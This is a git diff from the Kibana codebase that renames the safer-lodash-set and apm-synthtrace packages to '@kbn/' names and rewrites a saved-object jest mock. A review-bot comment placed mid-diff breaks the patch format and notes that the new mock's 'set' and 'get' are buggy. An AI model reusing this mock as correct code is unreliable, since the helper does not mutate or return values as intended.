 "@npm//@types/jest",
- "//packages/elastic-safer-lodash-set:npm_module_types",
+ "//packages/kbn-safer-lodash-set:npm_module_types",
 "//packages/kbn-config:npm_module_types",
 "//packages/kbn-config-mocks:npm_module_types",
 "//packages/core/base/core-base-server-internal:npm_module_types",
diff --git a/packages/core/logging/core-logging-server-internal/BUILD.bazel b/packages/core/logging/core-logging-server-internal/BUILD.bazel
index 199e47161d6a0..abed6f741fc39 100644
--- a/packages/core/logging/core-logging-server-internal/BUILD.bazel
+++ b/packages/core/logging/core-logging-server-internal/BUILD.bazel
@@ -29,7 +29,7 @@ RUNTIME_DEPS = [
 "@npm//lodash",
 "@npm//moment-timezone",
 "@npm//elastic-apm-node",
- "//packages/elastic-safer-lodash-set",
+ "//packages/kbn-safer-lodash-set",
 "//packages/kbn-config-schema",
 "//packages/kbn-std",
 ]
@@ -41,7 +41,7 @@ TYPES_DEPS = [
 "@npm//rxjs",
 "@npm//@types/moment-timezone",
 "@npm//elastic-apm-node",
- "//packages/elastic-safer-lodash-set:npm_module_types",
+ "//packages/kbn-safer-lodash-set:npm_module_types",
 "//packages/kbn-logging:npm_module_types",
 "//packages/kbn-config-schema:npm_module_types",
 "//packages/core/base/core-base-server-internal:npm_module_types",
diff --git a/packages/core/logging/core-logging-server-internal/src/appenders/rewrite/policies/meta/meta_policy.ts b/packages/core/logging/core-logging-server-internal/src/appenders/rewrite/policies/meta/meta_policy.ts
index 2618f0ed50587..45e62713980c0 100644
--- a/packages/core/logging/core-logging-server-internal/src/appenders/rewrite/policies/meta/meta_policy.ts
+++ b/packages/core/logging/core-logging-server-internal/src/appenders/rewrite/policies/meta/meta_policy.ts
@@ -8,7 +8,7 @@
 import { schema } from '@kbn/config-schema';
 import { LogRecord } from '@kbn/logging';
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import { has, unset } from 'lodash';
 import { assertNever } from '@kbn/std';
 import type { MetaRewritePolicyConfig } from '@kbn/core-logging-server';
diff --git a/packages/core/logging/core-logging-server-internal/src/global_context/merge_global_context.ts b/packages/core/logging/core-logging-server-internal/src/global_context/merge_global_context.ts
index 64186392caa56..7e794f0731cf5 100644
--- a/packages/core/logging/core-logging-server-internal/src/global_context/merge_global_context.ts
+++ b/packages/core/logging/core-logging-server-internal/src/global_context/merge_global_context.ts
@@ -7,7 +7,7 @@
 */
 import { has } from 'lodash';
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import { LogMeta } from '@kbn/logging';
 import { GlobalContext } from './types';
diff --git a/packages/core/saved-objects/core-saved-objects-browser-internal/BUILD.bazel b/packages/core/saved-objects/core-saved-objects-browser-internal/BUILD.bazel
index b0d0964c54a96..40aa528d50a98 100644
--- a/packages/core/saved-objects/core-saved-objects-browser-internal/BUILD.bazel
+++ b/packages/core/saved-objects/core-saved-objects-browser-internal/BUILD.bazel
@@ -29,7 +29,7 @@ NPM_MODULE_EXTRA_FILES = [
 RUNTIME_DEPS = [
 "@npm//lodash",
- "//packages/elastic-safer-lodash-set",
+ "//packages/kbn-safer-lodash-set",
 ### test dependencies
 "//packages/core/http/core-http-browser-mocks",
 ]
@@ -38,7 +38,7 @@ TYPES_DEPS = [
 "@npm//@types/node",
 "@npm//@types/jest",
 "@npm//lodash",
- "//packages/elastic-safer-lodash-set:npm_module_types",
+ "//packages/kbn-safer-lodash-set:npm_module_types",
 "//packages/core/base/core-base-browser-internal:npm_module_types",
 "//packages/core/http/core-http-browser:npm_module_types",
 "//packages/core/saved-objects/core-saved-objects-common:npm_module_types",
diff --git a/packages/core/saved-objects/core-saved-objects-browser-internal/src/simple_saved_object.ts b/packages/core/saved-objects/core-saved-objects-browser-internal/src/simple_saved_object.ts
index 89501c69dcfb5..adda64d8b4ff3 100644
--- a/packages/core/saved-objects/core-saved-objects-browser-internal/src/simple_saved_object.ts
+++ b/packages/core/saved-objects/core-saved-objects-browser-internal/src/simple_saved_object.ts
@@ -6,7 +6,7 @@
 * Side Public License, v 1.
 */
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import { get, has } from 'lodash';
 import type { SavedObject as SavedObjectType } from '@kbn/core-saved-objects-common';
 import type {
diff --git a/packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts b/packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts
index 6ed402ccc30c5..b65c476c54ee0 100644
--- a/packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts
+++ b/packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts
@@ -6,15 +6,62 @@
 * Side Public License, v 1.
 */
-import type { SavedObjectsClientContract } from '@kbn/core-saved-objects-api-browser';
-import { SimpleSavedObjectImpl } from '@kbn/core-saved-objects-browser-internal';
+import type {
+ SavedObjectsClientContract,
+ SimpleSavedObject,
+} from '@kbn/core-saved-objects-api-browser';
 import type { SavedObject } from '@kbn/core-saved-objects-common';
+type T = unknown;
+
+const simpleSavedObjectMockDefaults: Partial> = {
+ attributes: {},
+ _version: '',
+ id: 'id',
+ type: 'type',
+ migrationVersion: {},
+ coreMigrationVersion: '8.0.0',
+ error: undefined,
+ references: [],
+ updatedAt: '',
+ namespaces: undefined,
+};
+
 const createSimpleSavedObjectMock = (
- client: SavedObjectsClientContract,
- savedObject: SavedObject
-) => new SimpleSavedObjectImpl(client, savedObject);
+ savedObject: SavedObject
+): jest.Mocked> => {
+ const mock = {
+ ...simpleSavedObjectMockDefaults,
+ attributes: savedObject.attributes,
+ _version: savedObject.version,
+ id: savedObject.id,
+ type: savedObject.type,
+ migrationVersion: savedObject.migrationVersion,
+ coreMigrationVersion: savedObject.coreMigrationVersion,
+ error: savedObject.error,
+ references: savedObject.references,
+ updatedAt: savedObject.updated_at,
+ namespaces: savedObject.namespaces,
+ get: jest.fn(),
+ set: jest.fn(),
+ has: jest.fn(),
+ save: jest.fn(),
+ delete: jest.fn(),
+ };
+ mock.get.mockImplementation(
+ (key: string): any => (savedObject.attributes as any)[key] || undefined
+ );
+ mock.set.mockReturnValue((key: string, value: any) => {
+ (savedObject as any)[key] = value;
+ return savedObject;
+ });
+ mock.has.mockReturnValue(true);
+ mock.save.mockImplementation(() => Promise.resolve(mock));
+ mock.delete.mockImplementation(() => Promise.resolve({}));
+ return mock;
+};
 export const simpleSavedObjectMock = {
- create: createSimpleSavedObjectMock,
+ create: (client: SavedObjectsClientContract, savedObject: SavedObject) =>
+ 
createSimpleSavedObjectMock(savedObject),
 };
diff --git a/packages/core/test-helpers/core-test-helpers-deprecations-getters/BUILD.bazel b/packages/core/test-helpers/core-test-helpers-deprecations-getters/BUILD.bazel
index 19d2290d18f84..3eb0b8d9184fa 100644
--- a/packages/core/test-helpers/core-test-helpers-deprecations-getters/BUILD.bazel
+++ b/packages/core/test-helpers/core-test-helpers-deprecations-getters/BUILD.bazel
@@ -27,7 +27,7 @@ NPM_MODULE_EXTRA_FILES = [
 ]
 RUNTIME_DEPS = [
- "//packages/elastic-safer-lodash-set",
+ "//packages/kbn-safer-lodash-set",
 "//packages/kbn-config",
 "//packages/kbn-config-mocks",
 ]
@@ -35,7 +35,7 @@ RUNTIME_DEPS = [
 TYPES_DEPS = [
 "@npm//@types/node",
 "@npm//@types/jest",
- "//packages/elastic-safer-lodash-set:npm_module_types",
+ "//packages/kbn-safer-lodash-set:npm_module_types",
 "//packages/kbn-config:npm_module_types",
 "//packages/kbn-config-mocks:npm_module_types",
 ]
diff --git a/packages/core/test-helpers/core-test-helpers-deprecations-getters/src/deprecations_getters.ts b/packages/core/test-helpers/core-test-helpers-deprecations-getters/src/deprecations_getters.ts
index 825649a77ac51..9bdbd9c9b3efa 100644
--- a/packages/core/test-helpers/core-test-helpers-deprecations-getters/src/deprecations_getters.ts
+++ b/packages/core/test-helpers/core-test-helpers-deprecations-getters/src/deprecations_getters.ts
@@ -5,7 +5,7 @@
 * in compliance with, at your election, the Elastic License 2.0 or the Server
 * Side Public License, v 1.
 */
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import type { ConfigDeprecationProvider, ConfigDeprecationContext } from '@kbn/config';
 import { configDeprecationFactory, applyDeprecations } from '@kbn/config';
 import { configDeprecationsMock } from '@kbn/config-mocks';
diff --git a/packages/kbn-apm-config-loader/BUILD.bazel b/packages/kbn-apm-config-loader/BUILD.bazel
index 74b7fdfe52a1a..b7d9249c9f587 100644
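Review bot: `mock.set.mockReturnValue((key: string, value: any) => { ... })` in `createSimpleSavedObjectMock` hands the closure back as the return value of `set()` instead of executing it, so a test that calls `set('foo', 1)` receives a function and `savedObject` is never mutated; the sibling `get` uses `mockImplementation`, and `set` should too: `mock.set.mockImplementation((key: string, value: any) => {`. The `get` implementation's `|| undefined` also maps falsy attribute values (`0`, `''`, `false`) to `undefined`, which a test asserting on such a field would not expect; returning `(savedObject.attributes as any)[key]` directly preserves them. Note too that `get` reads `savedObject.attributes[key]` while the `set` closure writes `savedObject[key]` at the top level, so a `set` followed by `get` on the same key does not round-trip; if the real `SimpleSavedObject` keeps both on `attributes` (this diff shows `simple_saved_object.ts` importing `set` from `@kbn/safer-lodash-set`, presumably for exactly that), the closure should target `savedObject.attributes` as well. A one-line comment on `type T = unknown;` such as `// Mock is deliberately untyped over the attribute shape; callers narrow as needed.` would help, since the alias otherwise reads like a leftover.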
--- a/packages/kbn-apm-config-loader/BUILD.bazel
+++ b/packages/kbn-apm-config-loader/BUILD.bazel
@@ -27,14 +27,14 @@ NPM_MODULE_EXTRA_FILES = [
 ]
 RUNTIME_DEPS = [
- "//packages/elastic-safer-lodash-set",
+ "//packages/kbn-safer-lodash-set",
 "//packages/kbn-utils",
 "@npm//js-yaml",
 "@npm//lodash",
 ]
 TYPES_DEPS = [
- "//packages/elastic-safer-lodash-set:npm_module_types",
+ "//packages/kbn-safer-lodash-set:npm_module_types",
 "//packages/kbn-utils:npm_module_types",
 "@npm//@elastic/apm-rum",
 "@npm//@types/jest",
diff --git a/packages/kbn-apm-config-loader/src/utils/apply_config_overrides.ts b/packages/kbn-apm-config-loader/src/utils/apply_config_overrides.ts
index e2ae5a2dce3ba..54993ce0843f9 100644
--- a/packages/kbn-apm-config-loader/src/utils/apply_config_overrides.ts
+++ b/packages/kbn-apm-config-loader/src/utils/apply_config_overrides.ts
@@ -6,7 +6,7 @@
 * Side Public License, v 1.
 */
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import { getArgValue } from './read_argv';
 /**
diff --git a/packages/kbn-apm-config-loader/src/utils/read_config.ts b/packages/kbn-apm-config-loader/src/utils/read_config.ts
index 0d6fce88b0532..f41f8e66c7d5b 100644
--- a/packages/kbn-apm-config-loader/src/utils/read_config.ts
+++ b/packages/kbn-apm-config-loader/src/utils/read_config.ts
@@ -9,7 +9,7 @@
 import { readFileSync } from 'fs';
 import { safeLoad } from 'js-yaml';
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import { isPlainObject } from 'lodash';
 import { ensureDeepObject } from './ensure_deep_object';
diff --git a/packages/elastic-apm-synthtrace/BUILD.bazel b/packages/kbn-apm-synthtrace/BUILD.bazel
similarity index 96%
rename from packages/elastic-apm-synthtrace/BUILD.bazel
rename to packages/kbn-apm-synthtrace/BUILD.bazel
index d0963f43e171b..0e759e33c0ab5 100644
--- a/packages/elastic-apm-synthtrace/BUILD.bazel
+++ b/packages/kbn-apm-synthtrace/BUILD.bazel
@@ -2,8 +2,8 @@ load("@npm//@bazel/typescript:index.bzl", "ts_config")
 load("@build_bazel_rules_nodejs//:index.bzl", "js_library")
 load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project")
-PKG_BASE_NAME = "elastic-apm-synthtrace"
-PKG_REQUIRE_NAME = "@elastic/apm-synthtrace"
+PKG_BASE_NAME = "kbn-apm-synthtrace"
+PKG_REQUIRE_NAME = "@kbn/apm-synthtrace"
 SOURCE_FILES = glob(
 [
diff --git a/packages/elastic-apm-synthtrace/README.md b/packages/kbn-apm-synthtrace/README.md
similarity index 92%
rename from packages/elastic-apm-synthtrace/README.md
rename to packages/kbn-apm-synthtrace/README.md
index 24ce3b055abd0..3afc25fb7e9a8 100644
--- a/packages/elastic-apm-synthtrace/README.md
+++ b/packages/kbn-apm-synthtrace/README.md
@@ -1,6 +1,6 @@
-# @elastic/apm-synthtrace
+# @kbn/apm-synthtrace
-`@elastic/apm-synthtrace` is a tool in technical preview to generate synthetic APM data. It is intended to be used for development and testing of the Elastic APM app in Kibana.
+`@kbn/apm-synthtrace` is a tool in technical preview to generate synthetic APM data. It is intended to be used for development and testing of the Elastic APM app in Kibana.
 At a high-level, the module works by modeling APM events/metricsets with [a fluent API](https://en.wikipedia.org/wiki/Fluent_interface). The models can then be serialized and converted to Elasticsearch documents. In the future we might support APM Server as an output as well.
@@ -25,7 +25,7 @@ This library can currently be used in two ways:
 #### Example
 ```ts
-import { service, timerange, toElasticsearchOutput } from '@elastic/apm-synthtrace';
+import { service, timerange, toElasticsearchOutput } from '@kbn/apm-synthtrace';
 const instance = service('synth-go', 'production', 'go').instance('instance-a');
@@ -72,14 +72,14 @@ const esEvents = toElasticsearchOutput(traceEvents.concat(metricsets));
 #### Generating metricsets
-`@elastic/apm-synthtrace` can also automatically generate transaction metrics, span destination metrics and transaction breakdown metrics based on the generated trace events. If we expand on the previous example:
+`@kbn/apm-synthtrace` can also automatically generate transaction metrics, span destination metrics and transaction breakdown metrics based on the generated trace events. If we expand on the previous example:
 ```ts
 import {
 getTransactionMetrics,
 getSpanDestinationMetrics,
 getBreakdownMetrics,
-} from '@elastic/apm-synthtrace';
+} from '@kbn/apm-synthtrace';
 const esEvents = toElasticsearchOutput([
 ...traceEvents,
@@ -91,7 +91,7 @@ const esEvents = toElasticsearchOutput([
 ### CLI
-Via the CLI, you can run scenarios, either using a fixed time range or continuously generating data. Scenarios are available in [`packages/elastic-apm-synthtrace/src/scenarios/`](https://github.com/elastic/kibana/blob/main/packages/elastic-apm-synthtrace/src/scenarios/).
+Via the CLI, you can run scenarios, either using a fixed time range or continuously generating data. Scenarios are available in [`packages/kbn-apm-synthtrace/src/scenarios/`](https://github.com/elastic/kibana/blob/main/packages/kbn-apm-synthtrace/src/scenarios/).
 For live data ingestion:
diff --git a/packages/elastic-apm-synthtrace/bin/synthtrace b/packages/kbn-apm-synthtrace/bin/synthtrace
similarity index 100%
rename from packages/elastic-apm-synthtrace/bin/synthtrace
rename to packages/kbn-apm-synthtrace/bin/synthtrace
diff --git a/packages/elastic-apm-synthtrace/jest.config.js b/packages/kbn-apm-synthtrace/jest.config.js
similarity index 89%
rename from packages/elastic-apm-synthtrace/jest.config.js
rename to packages/kbn-apm-synthtrace/jest.config.js
index 13d8643c5213c..e89880dc7e8df 100644
--- a/packages/elastic-apm-synthtrace/jest.config.js
+++ b/packages/kbn-apm-synthtrace/jest.config.js
@@ -9,7 +9,7 @@
 module.exports = {
 preset: '@kbn/test',
 rootDir: '../..',
- roots: ['/packages/elastic-apm-synthtrace'],
+ roots: ['/packages/kbn-apm-synthtrace'],
 setupFiles: [],
 setupFilesAfterEnv: [],
 };
diff --git a/packages/elastic-apm-synthtrace/package.json b/packages/kbn-apm-synthtrace/package.json
similarity index 86%
rename from packages/elastic-apm-synthtrace/package.json
rename to packages/kbn-apm-synthtrace/package.json
index bbfcd496c922b..17d4c9b10b75b 100644
--- a/packages/elastic-apm-synthtrace/package.json
+++ b/packages/kbn-apm-synthtrace/package.json
@@ -1,5 +1,5 @@
 {
- "name": "@elastic/apm-synthtrace",
+ "name": "@kbn/apm-synthtrace",
 "version": "0.1.0",
 "description": "Elastic APM trace data generator",
 "license": "SSPL-1.0 OR Elastic License 2.0",
diff --git a/packages/elastic-apm-synthtrace/src/.eslintrc.js b/packages/kbn-apm-synthtrace/src/.eslintrc.js
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/.eslintrc.js
rename to packages/kbn-apm-synthtrace/src/.eslintrc.js
diff --git a/packages/elastic-apm-synthtrace/src/cli.ts b/packages/kbn-apm-synthtrace/src/cli.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli.ts
rename to packages/kbn-apm-synthtrace/src/cli.ts
diff --git a/packages/elastic-apm-synthtrace/src/cli/run_synthtrace.ts b/packages/kbn-apm-synthtrace/src/cli/run_synthtrace.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli/run_synthtrace.ts
rename to packages/kbn-apm-synthtrace/src/cli/run_synthtrace.ts
diff --git a/packages/elastic-apm-synthtrace/src/cli/scenario.ts b/packages/kbn-apm-synthtrace/src/cli/scenario.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli/scenario.ts
rename to packages/kbn-apm-synthtrace/src/cli/scenario.ts
diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/get_common_services.ts b/packages/kbn-apm-synthtrace/src/cli/utils/get_common_services.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli/utils/get_common_services.ts
rename to packages/kbn-apm-synthtrace/src/cli/utils/get_common_services.ts
diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/get_scenario.ts b/packages/kbn-apm-synthtrace/src/cli/utils/get_scenario.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli/utils/get_scenario.ts
rename to packages/kbn-apm-synthtrace/src/cli/utils/get_scenario.ts
diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/interval_to_ms.ts b/packages/kbn-apm-synthtrace/src/cli/utils/interval_to_ms.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli/utils/interval_to_ms.ts
rename to packages/kbn-apm-synthtrace/src/cli/utils/interval_to_ms.ts
diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/parse_run_cli_flags.ts b/packages/kbn-apm-synthtrace/src/cli/utils/parse_run_cli_flags.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli/utils/parse_run_cli_flags.ts
rename to packages/kbn-apm-synthtrace/src/cli/utils/parse_run_cli_flags.ts
diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/start_historical_data_upload.ts b/packages/kbn-apm-synthtrace/src/cli/utils/start_historical_data_upload.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli/utils/start_historical_data_upload.ts
rename to packages/kbn-apm-synthtrace/src/cli/utils/start_historical_data_upload.ts
diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/start_live_data_upload.ts b/packages/kbn-apm-synthtrace/src/cli/utils/start_live_data_upload.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli/utils/start_live_data_upload.ts
rename to packages/kbn-apm-synthtrace/src/cli/utils/start_live_data_upload.ts
diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/synthtrace_worker.ts b/packages/kbn-apm-synthtrace/src/cli/utils/synthtrace_worker.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli/utils/synthtrace_worker.ts
rename to packages/kbn-apm-synthtrace/src/cli/utils/synthtrace_worker.ts
diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/worker.js b/packages/kbn-apm-synthtrace/src/cli/utils/worker.js
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/cli/utils/worker.js
rename to packages/kbn-apm-synthtrace/src/cli/utils/worker.js
diff --git a/packages/elastic-apm-synthtrace/src/index.ts b/packages/kbn-apm-synthtrace/src/index.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/index.ts
rename to packages/kbn-apm-synthtrace/src/index.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/agent_config/agent_config.ts b/packages/kbn-apm-synthtrace/src/lib/agent_config/agent_config.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/agent_config/agent_config.ts
rename to packages/kbn-apm-synthtrace/src/lib/agent_config/agent_config.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/agent_config/agent_config_fields.ts b/packages/kbn-apm-synthtrace/src/lib/agent_config/agent_config_fields.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/agent_config/agent_config_fields.ts
rename to packages/kbn-apm-synthtrace/src/lib/agent_config/agent_config_fields.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/agent_config/index.ts b/packages/kbn-apm-synthtrace/src/lib/agent_config/index.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/agent_config/index.ts
rename to packages/kbn-apm-synthtrace/src/lib/agent_config/index.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/agent_config/observer.ts b/packages/kbn-apm-synthtrace/src/lib/agent_config/observer.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/agent_config/observer.ts
rename to packages/kbn-apm-synthtrace/src/lib/agent_config/observer.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/aggregators/service_latency_aggregator.ts b/packages/kbn-apm-synthtrace/src/lib/apm/aggregators/service_latency_aggregator.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/aggregators/service_latency_aggregator.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/aggregators/service_latency_aggregator.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/apm_error.ts b/packages/kbn-apm-synthtrace/src/lib/apm/apm_error.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/apm_error.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/apm_error.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/apm_fields.ts b/packages/kbn-apm-synthtrace/src/lib/apm/apm_fields.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/apm_fields.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/apm_fields.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/base_span.ts b/packages/kbn-apm-synthtrace/src/lib/apm/base_span.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/base_span.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/base_span.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/browser.ts b/packages/kbn-apm-synthtrace/src/lib/apm/browser.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/browser.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/browser.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/client/apm_synthtrace_es_client.ts b/packages/kbn-apm-synthtrace/src/lib/apm/client/apm_synthtrace_es_client.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/client/apm_synthtrace_es_client.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/client/apm_synthtrace_es_client.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/client/apm_synthtrace_kibana_client.ts b/packages/kbn-apm-synthtrace/src/lib/apm/client/apm_synthtrace_kibana_client.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/client/apm_synthtrace_kibana_client.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/client/apm_synthtrace_kibana_client.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/defaults/get_chrome_user_agent_defaults.ts b/packages/kbn-apm-synthtrace/src/lib/apm/defaults/get_chrome_user_agent_defaults.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/defaults/get_chrome_user_agent_defaults.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/defaults/get_chrome_user_agent_defaults.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/index.ts b/packages/kbn-apm-synthtrace/src/lib/apm/index.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/index.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/index.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/instance.ts b/packages/kbn-apm-synthtrace/src/lib/apm/instance.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/instance.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/instance.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/metricset.ts b/packages/kbn-apm-synthtrace/src/lib/apm/metricset.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/metricset.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/metricset.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/processors/get_breakdown_metrics.ts b/packages/kbn-apm-synthtrace/src/lib/apm/processors/get_breakdown_metrics.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/processors/get_breakdown_metrics.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/processors/get_breakdown_metrics.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/processors/get_span_destination_metrics.ts b/packages/kbn-apm-synthtrace/src/lib/apm/processors/get_span_destination_metrics.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/processors/get_span_destination_metrics.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/processors/get_span_destination_metrics.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/processors/get_transaction_metrics.ts b/packages/kbn-apm-synthtrace/src/lib/apm/processors/get_transaction_metrics.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/processors/get_transaction_metrics.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/processors/get_transaction_metrics.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/rum_span.ts b/packages/kbn-apm-synthtrace/src/lib/apm/rum_span.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/rum_span.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/rum_span.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/rum_transaction.ts b/packages/kbn-apm-synthtrace/src/lib/apm/rum_transaction.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/rum_transaction.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/rum_transaction.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/service.ts b/packages/kbn-apm-synthtrace/src/lib/apm/service.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/service.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/service.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/span.ts b/packages/kbn-apm-synthtrace/src/lib/apm/span.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/span.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/span.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/transaction.ts b/packages/kbn-apm-synthtrace/src/lib/apm/transaction.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/transaction.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/transaction.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/utils/aggregate.ts b/packages/kbn-apm-synthtrace/src/lib/apm/utils/aggregate.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/utils/aggregate.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/utils/aggregate.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/utils/create_picker.ts b/packages/kbn-apm-synthtrace/src/lib/apm/utils/create_picker.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/utils/create_picker.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/utils/create_picker.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/utils/get_apm_write_targets.ts b/packages/kbn-apm-synthtrace/src/lib/apm/utils/get_apm_write_targets.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/apm/utils/get_apm_write_targets.ts
rename to packages/kbn-apm-synthtrace/src/lib/apm/utils/get_apm_write_targets.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/entity.ts b/packages/kbn-apm-synthtrace/src/lib/entity.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/entity.ts
rename to packages/kbn-apm-synthtrace/src/lib/entity.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/entity_generator.ts b/packages/kbn-apm-synthtrace/src/lib/entity_generator.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/entity_generator.ts
rename to packages/kbn-apm-synthtrace/src/lib/entity_generator.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/entity_iterable.ts b/packages/kbn-apm-synthtrace/src/lib/entity_iterable.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/entity_iterable.ts
rename to packages/kbn-apm-synthtrace/src/lib/entity_iterable.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/entity_streams.ts b/packages/kbn-apm-synthtrace/src/lib/entity_streams.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/entity_streams.ts
rename to packages/kbn-apm-synthtrace/src/lib/entity_streams.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/interval.ts b/packages/kbn-apm-synthtrace/src/lib/interval.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/interval.ts
rename to packages/kbn-apm-synthtrace/src/lib/interval.ts
diff --git a/packages/elastic-apm-synthtrace/src/lib/serializable.ts b/packages/kbn-apm-synthtrace/src/lib/serializable.ts
similarity index 100%
rename from packages/elastic-apm-synthtrace/src/lib/serializable.ts
rename to packages/kbn-apm-synthtrace/src/lib/serializable.ts
